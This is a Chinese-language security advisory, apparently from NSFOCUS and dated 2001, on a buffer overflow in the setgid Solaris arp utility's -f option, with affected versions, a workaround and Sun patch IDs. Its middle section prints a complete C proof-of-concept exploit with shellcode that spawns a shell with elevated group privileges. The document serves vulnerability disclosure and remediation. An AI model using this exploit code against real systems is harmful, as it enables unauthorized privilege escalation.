安全研究

安全漏洞
Solaris arp 缓冲区溢出漏洞

发布日期:2001-01-15
更新日期:2001-01-15

受影响系统:

Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4

描述:

BUGTRAQ ID:2193

arp是一个用来查看和处理网络硬件地址映射表的工具。Solaris 8以前的系统
中,arp被设置了setgid属性,组id为"bin".

Solaris arp支持通过"-f"选项来加载包含在一个文件中的多条记录。文件中域
的值通过sscanf()函数来提取,由于没有判断输入长度,攻击者可能覆盖一个
固定长度的局部缓冲区,并执行任意代码。

攻击者成功后可以获取gid=bin的权限,并可能进一步获取root权限。

<*来源: Pablo Sor (psor@afip.gov.ar)
         Sun-00200: arp http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/200&type=0&nav=sec.sba
*>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


#include <fcntl.h>

/* arpexp.c

   arp overflow proof of concept by ahmed@securityfocus.com
   shellcode originally written by Cheez Whiz.

   tested on x86 solaris 7,8beta

   default should work.  if not, arg1 = offset. +- by 100's

   Except for shellcode, copyright Security-Focus.com, 11/2000
*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

  char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
                 "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
                 "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
                 "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
                 "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
                 "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
                 "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
                 "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
                 "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
                 "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
                 "\xff\xff";

  unsigned long magic = 0x8047b78;
  unsigned long r = get_esp() + 600;
  unsigned char buf[300];
  int f;

  if (ac == 2)
    r += atoi(av[1]);

  memset(buf,0x61,sizeof(buf));
  memcpy(buf+52,&magic,4);
  memcpy(buf+76,&r,4);

  f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
  write(f,"1 2 3 4 ",8);
  write(f,buf,sizeof(buf));
  close(f);

  memset(buf,0x90,sizeof(buf));
  memcpy(buf,"NSF=",4);
  memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
  putenv(buf);

  system("/usr/sbin/arp -f /tmp/ypx");
  unlink("/tmp/ypx");

}


建议:

临时解决方法:

NSFOCUS建议您暂时去掉arp的sgid属性。

厂商补丁:

Sun已经提供了响应的补丁:

    OS Version          Patch ID        
    __________          _________
    SunOS 5.7           109709-01  
    SunOS 5.7_x86       109710-01
    SunOS 5.6           109719-01
    SunOS 5.6_x86       109720-01
    SunOS 5.5.1         109721-01
    SunOS 5.5.1_x86     109722-01
    SunOS 5.5           109707-01
    SunOS 5.5_x86       109708-01
    SunOS 5.4           109723-01
    SunOS 5.4_x86       109724-01

补丁下载地址:
http://sunsolve.sun.com/securitypatch



浏览次数:4129
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障